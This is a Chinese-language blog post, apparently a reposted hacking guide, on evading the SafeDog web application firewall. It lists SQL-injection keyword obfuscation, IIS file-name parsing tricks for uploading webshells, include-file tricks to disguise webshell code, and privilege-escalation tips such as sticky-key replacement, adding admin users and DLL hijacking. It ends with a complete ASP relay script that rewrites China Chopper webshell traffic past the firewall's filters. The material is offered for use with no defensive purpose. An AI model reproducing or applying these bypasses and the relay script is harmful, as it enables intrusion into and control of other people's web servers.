滲透測(cè)試 - 突破安全狗的技術(shù)總匯 - cracer_CSDN
安全狗,無(wú)所謂,反正現(xiàn)在有些突破安全狗的方法A.1. 上傳一個(gè) jpg的文件 內(nèi)容為一句話2. 上傳一個(gè) 1.asp文件 插入代碼 <!- -#include =file = “jpg的文件” - ->然后就可以繞過安全狗解析了
B.還有一種上傳1.asp;(1).jpg
建立1.asp;這樣的目錄 你懂的!!~!!!!
過安全狗建立;1.asp目錄
突破安全狗的技術(shù)總匯
過安全狗主要過哪幾方面:?
1.過注入?
2.過大馬被阻攔訪問?
3.過菜刀連接一句話被攔截?
4.過1.asp;.jpg這樣的文件?
其他我沒遇到了。。?
現(xiàn)在一點(diǎn)一點(diǎn)講:?
1.過注入?
方法一:a.asp?aaa=%00&id=sql語(yǔ)句?
a.asp?aaa=%00.&id=sql
在被過濾的關(guān)鍵詞中添加 % (此方法經(jīng)常奏效,但是工具不支持,必須手動(dòng))
方法二: a.asp?id=sql語(yǔ)句 里面把安全過濾的加個(gè)%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin?
上傳篇
基本方法:?
文件名攔截突破:
1? / ;1.asp;1.jpg
2? /;1.cer/1.jpg
3? /;1.cer;.jpg/1.jpg
4? 正常文件建立,不帶;的,截?cái)嘁埠?,直接建立也?/p>
5.1;.....asa
b.文件內(nèi)容過安全狗:
? ? ? b.1? 各類加密,例如:http://sb.***.net/thread-8616-1-1.html
? ? ? b.2? include文件,例如<!--#include file="1.jpg" -->
提權(quán)篇
其實(shí)對(duì)于一些老狗,提權(quán)時(shí)候可以無(wú)視,但是有時(shí)候會(huì)禁止添加用戶,會(huì)禁止反向鏈接(部分遠(yuǎn)控),這一點(diǎn)360也一樣
那么遇到的時(shí)候有下面幾種方法可以嘗試:
a. 獲取明文密碼(方法不限,或?qū)С鰄ash破解)
b. 替換粘滯鍵或者放大鏡等
c. 用net user admin admin /ad? (ad 不是 add,記得以前360可以這么過)
d. dll劫持
2.過大馬被阻攔訪問?
方法一:上傳一個(gè)大馬 然后訪問http://sss.***.com/dama.asp 訪問后出現(xiàn)攔截。?
那么解決方法 先將dama.asp改名dama.jpg上傳,然后在同目錄上傳個(gè)文件da.asp 內(nèi)容為: 這樣再訪問da.asp 就不會(huì)被攔截了。?
3.過菜刀連接一句話被攔截?
方法一:不用菜刀連接一句話,用別的一句話連接端。?
方法二:中轉(zhuǎn)下連接菜刀,把過濾掉的詞替換掉。?
4.過1.asp;.jpg這樣的文件攔截?
方法一:;1.asp;.jpg?
方法二:保密?
具體就為大家總結(jié)這么多了,安全狗 反正基本可以無(wú)視了??!?
大家還有什么要補(bǔ)充的可以發(fā)在下面!?
下面這個(gè)腳本是過安全狗連接菜刀用的 用法: 先把這個(gè)腳本放到個(gè)可執(zhí)行.asp的目錄?
然后訪問http://www.***.com/asf.asp?dz=你要過的那個(gè)webshell地址?
然后把地址輸入進(jìn)菜刀 密碼還是你要過的那個(gè)webshell的密碼 類型也是選擇那個(gè)一句話木馬的后綴類型?
例如:http://www.***.com/asf.asp?dz=http://xxx.com/yijuhua.php 密碼?
這樣輸入就菜刀?
這個(gè)腳本暫時(shí)支持.php .aspx的一句話連接 .asp的可能還不行 沒測(cè)試過。如果誰(shuí)有裝了安全狗的webshell可以告訴我下。我再測(cè)試下把這個(gè)腳本修改全面都支持!?
<%
'饒過的原理,抓菜刀連接webshell的包 然后研究安全狗過濾了哪些關(guān)鍵字 中轉(zhuǎn)替換掉那些過濾的關(guān)鍵字 就成!
JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
JmStr=Replace(JmStr,"->|","-->|")
JmStr=Replace(JmStr,"@eval(","@eval (")
JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
JMUrl=request("dz")
response.write request("dz")
JmRef=JMUrl
JmCok=""
'作者: 鬼哥
'菜刀突破安全狗連接!
'www.***.com
response.write PostData(JMUrl,JmStr,JmCok,JmRef)?
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
'.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function?
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function?
Function URLEncoding(vstrin)
strReturn=""
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
strReturn=Replace(strReturn,chr(32),"%20") '轉(zhuǎn)換空格,如果網(wǎng)站過濾了空格,嘗試用/**/來(lái)代替%20
strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加轉(zhuǎn)換+字符
'strReturn=Replace(strReturn,過濾字符,"轉(zhuǎn)換為字符") '在此增加要過濾的代碼
URLEncoding=strReturn
End Function
%>?